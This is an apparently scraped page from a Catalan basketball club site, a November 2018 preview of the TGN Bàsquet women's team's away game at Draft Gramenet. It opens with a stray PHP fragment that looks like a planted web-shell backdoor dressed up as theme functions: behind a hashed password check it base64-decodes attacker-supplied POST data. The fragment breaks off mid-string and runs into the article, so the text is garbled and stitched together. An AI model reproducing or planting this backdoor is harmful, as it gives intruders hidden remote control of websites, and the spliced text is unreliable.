function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet visita el Draft Gramenet disposat a sumar el segon triomf consecutiu (diumenge, 18 h) - Tgn Bàsquet Club -

El TGN Bàsquet visita el Draft Gramenet disposat a sumar el segon triomf consecutiu (diumenge, 18 h)

By
Updated: novembre 23, 2018

El sènior femení del TGN Bàsquet té una molt bona oportunitat per escalar posicions a la taula classificatòria aquest diumenge. El conjunt lila visita la pista del Draft Gramenet (18 h), un equip que es troba en la desena posició amb un balanç de 4 victòries i 5 derrotes, un triomf més que el TGN Bàsquet que és catorzè. Els dos equips tenen, a més, un partit menys.

Si les tarragonines guanyen, atraparan les de Santa Coloma de Gramenet i això permetrà a les noies que entrena Juan Carlos Arjona allunyar-se de les posicions de la cua de la classificació. El tècnic lila té, però, com la setmana passada, un important handicap en forma de lesions perquè no podrà comptar amb la pivot Jessica De Gree, lesionada de fa setmanes al genoll i tampoc amb Laura Pascual. La base, una peça clau en aquest conjunt, es va lesionar al turmell fa tot just una setmana en l’entrenament previa al partit contra el Petropinto Sant Fruitós del dissabte passat (48-47) i està a l’espera del resultat de les proves mèdiques que s’ha fet. «El Draft Gramenet és un equip que compta amb jugadores interiors amb molta mobilitat i les exteriors són ràpides i juguen bé en l’un contra un. Haurem de competir al màxim nivell i imprimir un ritme alt de joc si volem aconseguir el triomf», diu Arjona, que admet que les baixes que té són «importants» però confia en el bon treball de l’equip per sortir-ne victoriós.

El TGN Bàsquet ha guanyat només un partit fora del Sagrat Cor fins ara en una lliga que està sent molt competida i on hi ha una gran igualtat si exceptuem el Basket Almeda que governa amb puny de ferro la competició amb un balanç excel·lent de deu victòries i cap derrota.

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *